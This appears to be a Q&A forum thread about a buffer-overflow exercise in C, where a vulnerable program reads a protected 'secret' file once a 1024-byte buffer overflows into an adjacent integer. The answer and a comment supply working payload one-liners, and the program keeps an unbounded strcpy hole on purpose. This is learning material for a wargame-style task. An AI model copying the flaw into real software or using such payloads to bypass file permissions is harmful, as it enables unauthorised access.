# Buffer Overflow exploit in C

Tags: memory, c

Given below is the code from file q2.c

I need to use memory exploit to read the content of file 'secret' that has no read permission for my group.

I tried using  `./q2 $(python -c 'print "\xad\xdd\xba"*1024 ')`  to get the output from file 'secret' (look line 28), but probably I did some mistake.

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv) 
{
// the struct is used to ensure the loc variables are in the same order
// without struct, compiler can swap these around making expolit impossible  
struct {
 char buffer[1024];
 volatile int changeme;
} locals;

locals.changeme = 0;

if (argc != 2) {
  printf("Usage: q2 <some string>\n");
  return 1;
}
// copy argument to the buffer
strcpy(locals.buffer, argv[1]);

// reveal the secret if "changeme" has been changed
if (locals.changeme == 0xbaddad) {
 setreuid(geteuid(),getegid());
 system("cat /home/q2/secret");
} 
else {
 printf("Try again!\n");
}
exit(0);
}
```

Comment: This is clearly related to https://unix.stackexchange.com/q/515605/5132 and https://unix.stackexchange.com/q/515626/5132 , posted within the same few hours by a different account.  Question #1 (q1) is at https://unix.stackexchange.com/q/515363/5132 .

Answer (score 0):

The problem occurs when you pass the arguments from the command:

```
$(python -c 'print "\xad\xdd\xba"*1024 ')
```

Here `\xad\xdd\xba`, actually takes 3 bytes so it becomes 3*1024 bytes. Also 1024 is not divisible by 3, if the buffer was of size 1023, then it would have work.

So instead of this try:

```
$(python -c 'print "\xab" * 1024 + "\xad\xdd\xba"')
```

It will fill the buffer with `\xab`, then for the next three bytes, it will fill the integer with the value you want.

Comment: Or, with GNU `awk`: `awk 'BEGIN { printf("%1024s%c%c%c", 0x0, 0xad, 0xdd, 0xba) }'`